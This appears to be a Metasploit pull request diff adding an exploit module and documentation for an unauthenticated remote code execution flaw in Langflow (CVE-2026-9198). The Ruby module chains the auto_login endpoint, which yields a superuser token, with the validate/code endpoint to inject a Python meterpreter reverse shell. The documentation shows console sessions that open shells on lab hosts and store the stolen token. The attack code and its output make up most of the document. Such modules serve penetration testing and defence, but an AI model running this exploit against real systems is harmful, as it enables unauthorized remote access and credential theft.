### PR TITLE
ENH: CISA KEV - Exploit module for CVE-2026-9198

### DIFF
--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_9198.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_9198.md
@@ -1,0 +1,87 @@
+## Vulnerable Application
+
+Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint.
+A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
+
+The vulnerability affects:
+
+    * Langflow < 1.3.0 even if authentication is enabled
+    * Langflow <= 1.3.2 (latest at the time of this writing) if authentication isn't enabled.
+
+This module was successfully tested on:
+
+    * Langflow 1.3.2 installed with Docker (authentication isn't enabled)
+
+
+### Installation
+1. `git clone https://github.com/langflow-ai/langflow.git`
+
+2. `cd langflow/docker_example`
+
+3. `docker compose up`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2025_3248`
+4. Do: `run lhost=<lhost> rhost=<rhost>`
+5. You should get a meterpreter
+
+
+## Options
+
+
+## Scenarios
+```
+msf > use exploit/multi/http/langflow_unauth_rce_cve_2025_3248
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf exploit(multi/http/langflow_unauth_rce_cve_2025_3248) > options
+
+Module options (exploit/multi/http/langflow_unauth_rce_cve_2025_3248):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    7860             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Python payload
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(multi/http/langflow_unauth_rce_cve_2025_3248) > run lhost=192.168.56.1 rhost=192.168.56.16
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.3.2 detected and authentication is disabled. Which is vulnerable.
+[*] Sending stage (24772 bytes) to 192.168.56.16
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:57118) at 2025-04-12 10:00:32 +0900
+
+meterpreter > getuid
+Server username: user
+meterpreter > sysinfo
+Computer        : 06d3984f101d
+OS              : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter > 
+```

--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_9198.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_9198.md
@@ -2,7 +2,7 @@
 
 Langflow versions up to and including 1.10.0 are susceptible to unauthenticated remote code
 execution. By chaining together /api/v1/auto_login (mints SUPERUSER tokens to any network caller)
-with /api/v1/validate/code (executes user code via exec()), a remote unauthenticated attacker 
+with /api/v1/validate/code (executes user code via exec()), a remote unauthenticated attacker
 can send crafted HTTP requests to execute arbitrary code.
 
 The vulnerability affects:
@@ -44,4 +44,22 @@ sudo docker run -d \
 
 
 ## Scenarios
+```
+msf > use exploit/multi/http/langflow_unauth_rce_cve_2026_9198
+[*] Using configured payload python/meterpreter/reverse_tcp
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_9198) > set RHOSTS 192.168.1.30
+RHOSTS => 192.168.1.30
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_9198) > set LHOST 192.168.1.30
+LHOST => 192.168.1.30
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_9198) > check
+[+] 192.168.1.30:7860 - The target appears to be vulnerable. Version 1.8.4 detected. Which is vulnerable.
+msf exploit(multi/http/langflow_unauth_rce_cve_2026_9198) > exploit
+[*] Started reverse TCP handler on 192.168.1.30:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.8.4 detected. Which is vulnerable.
+[+] API token retrieved eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI4ZTYyMjJkZi05Y2JhLTQ3MWItYjA4ZS01MTc1M2U5ZmY3ZGQiLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxODE3NTA1ODE5fQ.0Zeg-LZG2e9UGVrooyCBedVOBD5p7IgSI99VoKgjc44
+[*] Sending stage (34540 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 172.17.0.2:49106) at 2026-08-05 18:43:42 -0400
 
+meterpreter > 
+```

--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_9198.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_9198.md
@@ -45,21 +45,19 @@ sudo docker run -d \
 
 ## Scenarios
 ```
-msf > use exploit/multi/http/langflow_unauth_rce_cve_2026_9198
+msf > use multi/http/langflow_unauth_rce_cve_2026_9198
 [*] Using configured payload python/meterpreter/reverse_tcp
 msf exploit(multi/http/langflow_unauth_rce_cve_2026_9198) > set RHOSTS 192.168.1.30
 RHOSTS => 192.168.1.30
 msf exploit(multi/http/langflow_unauth_rce_cve_2026_9198) > set LHOST 192.168.1.30
 LHOST => 192.168.1.30
-msf exploit(multi/http/langflow_unauth_rce_cve_2026_9198) > check
-[+] 192.168.1.30:7860 - The target appears to be vulnerable. Version 1.8.4 detected. Which is vulnerable.
 msf exploit(multi/http/langflow_unauth_rce_cve_2026_9198) > exploit
 [*] Started reverse TCP handler on 192.168.1.30:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 1.8.4 detected. Which is vulnerable.
-[+] API token retrieved eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI4ZTYyMjJkZi05Y2JhLTQ3MWItYjA4ZS01MTc1M2U5ZmY3ZGQiLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxODE3NTA1ODE5fQ.0Zeg-LZG2e9UGVrooyCBedVOBD5p7IgSI99VoKgjc44
 [*] Sending stage (34540 bytes) to 172.17.0.2
-[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 172.17.0.2:49106) at 2026-08-05 18:43:42 -0400
+[+] Langflow SUPERUSER API key stored in /home/richard/.msf4/loot/20260805192722_default_192.168.1.30_langflow.files_497250.txt
+[*] Meterpreter session 1 opened (192.168.1.30:4444 -> 172.17.0.2:55930) at 2026-08-05 19:27:23 -0400
 
 meterpreter > 
 ```

--- a/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_9198.md
+++ b/documentation/modules/exploit/multi/http/langflow_unauth_rce_cve_2026_9198.md
@@ -1,31 +1,41 @@
 ## Vulnerable Application
 
-Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint.
-A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
+Langflow versions up to and including 1.10.0 are susceptible to unauthenticated remote code
+execution. By chaining together /api/v1/auto_login (mints SUPERUSER tokens to any network caller)
+with /api/v1/validate/code (executes user code via exec()), a remote unauthenticated attacker 
+can send crafted HTTP requests to execute arbitrary code.
 
 The vulnerability affects:
 
-    * Langflow < 1.3.0 even if authentication is enabled
-    * Langflow <= 1.3.2 (latest at the time of this writing) if authentication isn't enabled.
+    * Langflow <= 1.10.0 even if authentication is enabled
+
 
 This module was successfully tested on:
 
-    * Langflow 1.3.2 installed with Docker (authentication isn't enabled)
+    * Langflow 1.8.4 installed with Docker (authentication is enabled)
 
 
 ### Installation
-1. `git clone https://github.com/langflow-ai/langflow.git`
+1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
+2. Install Ubuntu Linux (or other Linux distro) in your virtualization engine.
+3. Pull pre-built Langflow docker container (v1.8.4) in your VM.
+   `docker pull langflowai/langflow:1.8.4`
+4. Start the langflow container.
 
-2. `cd langflow/docker_example`
 
-3. `docker compose up`
-
+```
+sudo docker run -d \
+  --name langflow \
+  -p 192.168.1.30:7860:7860 \
+  --restart unless-stopped \
+  langflowai/langflow:1.8.4 \
+```
 
 ## Verification Steps
 
 1. Install the application
 2. Start msfconsole
-3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2025_3248`
+3. Do: `use exploit/multi/http/langflow_unauth_rce_cve_2026_9198`
 4. Do: `run lhost=<lhost> rhost=<rhost>`
 5. You should get a meterpreter
 
@@ -34,54 +44,4 @@ This module was successfully tested on:
 
 
 ## Scenarios
-```
-msf > use exploit/multi/http/langflow_unauth_rce_cve_2025_3248
-[*] Using configured payload python/meterpreter/reverse_tcp
-msf exploit(multi/http/langflow_unauth_rce_cve_2025_3248) > options
 
-Module options (exploit/multi/http/langflow_unauth_rce_cve_2025_3248):
-
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT    7860             yes       The target port (TCP)
-   SSL      false            no        Negotiate SSL/TLS for outgoing connections
-   VHOST                     no        HTTP server virtual host
-
-
-Payload options (python/meterpreter/reverse_tcp):
-
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST                   yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Python payload
-
-
-
-View the full module info with the info, or info -d command.
-
-msf exploit(multi/http/langflow_unauth_rce_cve_2025_3248) > run lhost=192.168.56.1 rhost=192.168.56.16
-[*] Started reverse TCP handler on 192.168.56.1:4444 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version 1.3.2 detected and authentication is disabled. Which is vulnerable.
-[*] Sending stage (24772 bytes) to 192.168.56.16
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:57118) at 2025-04-12 10:00:32 +0900
-
-meterpreter > getuid
-Server username: user
-meterpreter > sysinfo
-Computer        : 06d3984f101d
-OS              : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
-Architecture    : x64
-System Language : C
-Meterpreter     : python/linux
-meterpreter > 
-```

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -1,3 +1,5 @@
+# frozen_string_literal: true
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -113,6 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, 'Could not retrieve SUPERUSER API key from /api/v1/auto_login')
     end
 
+    print_good("API token retrieved #{token}")
     res = send_request_cgi(
       {
         'method' => 'POST',

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -104,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Patched version of Langflow
     Exploit::CheckCode::Safe(
-      "Version #{version_str} detected and authentication is enabled. which is not vulnerable."
+      "Version #{version_str} detected, which is not vulnerable."
     )
   end
 

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -99,13 +99,14 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('Failed to identify application.') unless package
     return Exploit::CheckCode::Safe('Application is not Langflow.') unless package.to_s.downcase == 'langflow'
 
+    version = Rex::Version.new(version_str.to_s)
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
+
     # Vulnerable version of Langflow
-    return Exploit::CheckCode::Appears("Version #{version_str} detected. Which is vulnerable.") if version_str < Rex::Version.new('1.10.0')
+    return Exploit::CheckCode::Appears("Version #{version} detected, which appears vulnerable.") if version < Rex::Version.new('1.10.0')
 
     # Patched version of Langflow
-    Exploit::CheckCode::Safe(
-      "Version #{version_str} detected, which is not vulnerable."
-    )
+    Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")
   end
 
   def exploit

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -105,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
 
     # Vulnerable version of Langflow
-    return Exploit::CheckCode::Appears("Version #{version} detected, which appears vulnerable.") if version <= Rex::Version.new('1.10.0')
+    return Exploit::CheckCode::Appears("Version #{version} detected, which appears vulnerable.") if version <= Rex::Version.new('1.10.1')
 
     # Patched version of Langflow
     Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -1,0 +1,98 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Langflow AI RCE',
+        'Description' => %q{
+          Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint.
+          A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
+        },
+        'Author' => [
+          'Naveen Sunkavally (Horizon3.ai)', # Vulnerability discovery and PoC
+          'Takahiro Yokoyama'                # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-3248'],
+          ['EDB', '52262'],
+          ['EDB', '52364'],
+          ['URL', 'https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/'],
+        ],
+        'Targets' => [
+          [
+            'Python payload',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON,
+              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => '"'
+        },
+        'DisclosureDate' => '2025-04-09',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(7860),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/version')
+    })
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
+
+    json_version = res&.get_json_document&.fetch('version', nil)
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless json_version
+
+    version = Rex::Version.new(json_version)
+    return Exploit::CheckCode::Unknown('Failed to get version.') unless version
+
+    return Exploit::CheckCode::Appears("Version #{version} detected. Which is vulnerable even if authentication is enabled.") if version < Rex::Version.new('1.3.0')
+
+    # check if auto_login is enabled or not
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/auto_login')
+    })
+    return Exploit::CheckCode::Appears("Version #{version} detected and authentication is disabled. Which is vulnerable.") if res&.code == 200
+
+    Exploit::CheckCode.Safe("Version #{version} detected and authentication is enabled. which is not vulnerable.")
+  end
+
+  def exploit
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api/v1/validate/code'),
+      'headers' => { 'Content-Type' => 'application/json' },
+      'data' => {
+        'code' => "@exec(\"#{payload.encode}\")\ndef #{rand_text_alpha(6)}():\n    pass"
+      }.to_json
+    })
+    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
+  end
+
+end

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -92,18 +92,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
 
-    json_version = res&.get_json_document&.fetch('version', nil)
-    return Exploit::CheckCode::Unknown('Failed to parse version.') unless json_version
-
-    version = Rex::Version.new(json_version)
-    return Exploit::CheckCode::Unknown('Failed to get version.') unless version
+    doc = res.get_json_document
+    package = doc.is_a?(Hash) ? doc['package'] : nil
+    version_str = doc.is_a?(Hash) ? doc['version'] : nil
+    return Exploit::CheckCode::Unknown('Failed to parse version.') unless version_str
+    return Exploit::CheckCode::Unknown('Failed to identify application.') unless package
+    return Exploit::CheckCode::Safe('Application is not Langflow.') unless package.to_s.downcase == 'langflow'
 
     # Vulnerable version of Langflow
-    return Exploit::CheckCode::Appears("Version #{version} detected. Which is vulnerable.") if version < Rex::Version.new('1.10.0')
+    return Exploit::CheckCode::Appears("Version #{version_str} detected. Which is vulnerable.") if version_str < Rex::Version.new('1.10.0')
 
     # Patched version of Langflow
     Exploit::CheckCode::Safe(
-      "Version #{version} detected and authentication is enabled. which is not vulnerable."
+      "Version #{version_str} detected and authentication is enabled. which is not vulnerable."
     )
   end
 

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Langflow AI RCE',
         'Description' => %q{
-          Langflow versions up to and including 1.10.0 are susceptible to
+          Langflow versions 1.10.0 and below are susceptible to
           unauthenticated remote code execution. By chaining
           /api/v1/auto_login with /api/v1/validate/code, a remote
           unauthenticated attacker can send crafted HTTP requests to execute
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
         Opt::RPORT(7860),
         OptString.new(
           'TARGETURI',
-          [true, 'Base path of the Ray Dashboard', '/']
+          [true, 'Base path of the Langflow application', '/']
         )
       ]
     )
@@ -79,6 +79,8 @@ class MetasploitModule < Msf::Exploit::Remote
     return unless res && res.code == 200
 
     json = res.get_json_document
+    return unless json.is_a?(Hash)
+
     json['access_token']
   end
 
@@ -113,7 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Get SUPERUSER token
     token = get_token
 
-    if token.empty?
+    if token.to_s.empty?
       fail_with(Failure::UnexpectedReply, 'Could not retrieve SUPERUSER API key from /api/v1/auto_login')
     end
 
@@ -130,17 +132,17 @@ class MetasploitModule < Msf::Exploit::Remote
         }.to_json
       }
     )
-    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
+    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res&.code == 200
 
     loot_path = store_loot(
-      'langflow.files',
+      'langflow.token',
       'text/plain',
       rhost,
       token,
-      'langflow_files.txt',
-      'Langflow SUPERUSER API key retrieved from first stage of exploit.'
+      'langflow_token.txt',
+      'Langflow SUPERUSER access token retrieved from first stage of exploit.'
     )
 
-    print_good("Langflow SUPERUSER API key stored in #{loot_path}")
+    print_good("Langflow SUPERUSER access token stored in #{loot_path}")
   end
 end

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -47,9 +47,9 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'DisclosureDate' => '2026-07-17',
         'Notes' => {
-          'Stability' => [CRASH_SAFE],
-          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
-          'Reliability' => [REPEATABLE_SESSION]
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
         }
       )
     )

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Langflow AI RCE',
+        'Name' => 'Langflow AI auto_login RCE',
         'Description' => %q{
           Langflow versions 1.10.0 and below are susceptible to
           unauthenticated remote code execution. By chaining
@@ -95,9 +95,10 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
 
     doc = res.get_json_document
-    package = doc.is_a?(Hash) ? doc['package'] : nil
     version_str = doc.is_a?(Hash) ? doc['version'] : nil
     return Exploit::CheckCode::Unknown('Failed to parse version.') unless version_str
+
+    package = doc.is_a?(Hash) ? doc['package'] : nil
     return Exploit::CheckCode::Unknown('Failed to identify application.') unless package
     return Exploit::CheckCode::Safe('Application is not Langflow.') unless package.to_s.downcase == 'langflow'
 

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -15,19 +15,15 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Langflow AI RCE',
         'Description' => %q{
-          Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint.
-          A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
+          Langflow versions up to and including 1.10.0 are susceptible to unauthenticated remote code
+          execution. By chaining /api/v1/auto_login with /api/v1/validate/code, a remote unauthenticated 
+          attacker can send crafted HTTP requests to execute arbitrary code.
         },
-        'Author' => [
-          'Naveen Sunkavally (Horizon3.ai)', # Vulnerability discovery and PoC
-          'Takahiro Yokoyama'                # Metasploit module
-        ],
+        'Author' => [ 'Richard Howe <rhowe425>'],
         'License' => MSF_LICENSE,
         'References' => [
-          ['CVE', '2025-3248'],
-          ['EDB', '52262'],
-          ['EDB', '52364'],
-          ['URL', 'https://www.horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/'],
+          ['CVE', '2026-9198'],
+          ['URL', 'https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-9198'],
         ],
         'Targets' => [
           [
@@ -43,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Payload' => {
           'BadChars' => '"'
         },
-        'DisclosureDate' => '2025-04-09',
+        'DisclosureDate' => '2026-07-17',
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
@@ -71,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
     version = Rex::Version.new(json_version)
     return Exploit::CheckCode::Unknown('Failed to get version.') unless version
 
-    return Exploit::CheckCode::Appears("Version #{version} detected. Which is vulnerable even if authentication is enabled.") if version < Rex::Version.new('1.3.0')
+    return Exploit::CheckCode::Appears("Version #{version} detected. Which is vulnerable even if authentication is enabled.") if version < Rex::Version.new('1.10.0')
 
     # check if auto_login is enabled or not
     res = send_request_cgi({

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -105,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
 
     # Vulnerable version of Langflow
-    return Exploit::CheckCode::Appears("Version #{version} detected, which appears vulnerable.") if version < Rex::Version.new('1.10.0')
+    return Exploit::CheckCode::Appears("Version #{version} detected, which appears vulnerable.") if version <= Rex::Version.new('1.10.0')
 
     # Patched version of Langflow
     Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -113,7 +113,6 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::UnexpectedReply, 'Could not retrieve SUPERUSER API key from /api/v1/auto_login')
     end
 
-    print_good("API token retrieved #{token}")
     res = send_request_cgi(
       {
         'method' => 'POST',
@@ -127,7 +126,17 @@ class MetasploitModule < Msf::Exploit::Remote
         }.to_json
       }
     )
-
     fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
+
+    loot_path = store_loot(
+      'langflow.files',
+      'text/plain',
+      rhost,
+      token,
+      'langflow_files.txt',
+      'Langflow SUPERUSER API key retrieved from first stage of exploit.'
+    )
+
+    print_good("Langflow SUPERUSER API key stored in #{loot_path}")
   end
 end

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -105,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('Failed to parse version.') unless version
 
     # Vulnerable version of Langflow
-    return Exploit::CheckCode::Appears("Version #{version} detected, which appears vulnerable.") if version <= Rex::Version.new('1.10.1')
+    return Exploit::CheckCode::Appears("Version #{version} detected, which appears vulnerable.") if version < Rex::Version.new('1.10.1')
 
     # Patched version of Langflow
     Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")

--- a/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
+++ b/modules/exploits/multi/http/langflow_unauth_rce_cve_2026_9198.rb
@@ -15,15 +15,19 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Langflow AI RCE',
         'Description' => %q{
-          Langflow versions up to and including 1.10.0 are susceptible to unauthenticated remote code
-          execution. By chaining /api/v1/auto_login with /api/v1/validate/code, a remote unauthenticated 
-          attacker can send crafted HTTP requests to execute arbitrary code.
+          Langflow versions up to and including 1.10.0 are susceptible to
+          unauthenticated remote code execution. By chaining
+          /api/v1/auto_login with /api/v1/validate/code, a remote
+          unauthenticated attacker can send crafted HTTP requests to execute
+          arbitrary code.
         },
-        'Author' => [ 'Richard Howe <rhowe425>'],
+        'Author' => [
+          'Richard Howe <rhowe425>'
+        ],
         'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2026-9198'],
-          ['URL', 'https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-9198'],
+          ['URL', 'https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-9198']
         ],
         'Targets' => [
           [
@@ -31,7 +35,9 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'python',
               'Arch' => ARCH_PYTHON,
-              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
+              'DefaultOptions' => {
+                'PAYLOAD' => 'python/meterpreter/reverse_tcp'
+              }
             }
           ]
         ],
@@ -41,24 +47,47 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'DisclosureDate' => '2026-07-17',
         'Notes' => {
-          'Stability' => [ CRASH_SAFE, ],
-          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-          'Reliability' => [ REPEATABLE_SESSION, ]
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
         }
       )
     )
+
     register_options(
       [
         Opt::RPORT(7860),
+        OptString.new(
+          'TARGETURI',
+          [true, 'Base path of the Ray Dashboard', '/']
+        )
       ]
     )
   end
 
+  def get_token
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, '/api/v1/auto_login'),
+        'ctype' => 'application/json'
+      }
+    )
+
+    return unless res && res.code == 200
+
+    json = res.get_json_document
+    json['access_token']
+  end
+
   def check
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'api/v1/version')
-    })
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'api/v1/version')
+      }
+    )
+
     return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
 
     json_version = res&.get_json_document&.fetch('version', nil)
@@ -67,28 +96,37 @@ class MetasploitModule < Msf::Exploit::Remote
     version = Rex::Version.new(json_version)
     return Exploit::CheckCode::Unknown('Failed to get version.') unless version
 
-    return Exploit::CheckCode::Appears("Version #{version} detected. Which is vulnerable even if authentication is enabled.") if version < Rex::Version.new('1.10.0')
+    # Vulnerable version of Langflow
+    return Exploit::CheckCode::Appears("Version #{version} detected. Which is vulnerable.") if version < Rex::Version.new('1.10.0')
 
-    # check if auto_login is enabled or not
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'api/v1/auto_login')
-    })
-    return Exploit::CheckCode::Appears("Version #{version} detected and authentication is disabled. Which is vulnerable.") if res&.code == 200
-
-    Exploit::CheckCode.Safe("Version #{version} detected and authentication is enabled. which is not vulnerable.")
+    # Patched version of Langflow
+    Exploit::CheckCode::Safe(
+      "Version #{version} detected and authentication is enabled. which is not vulnerable."
+    )
   end
 
   def exploit
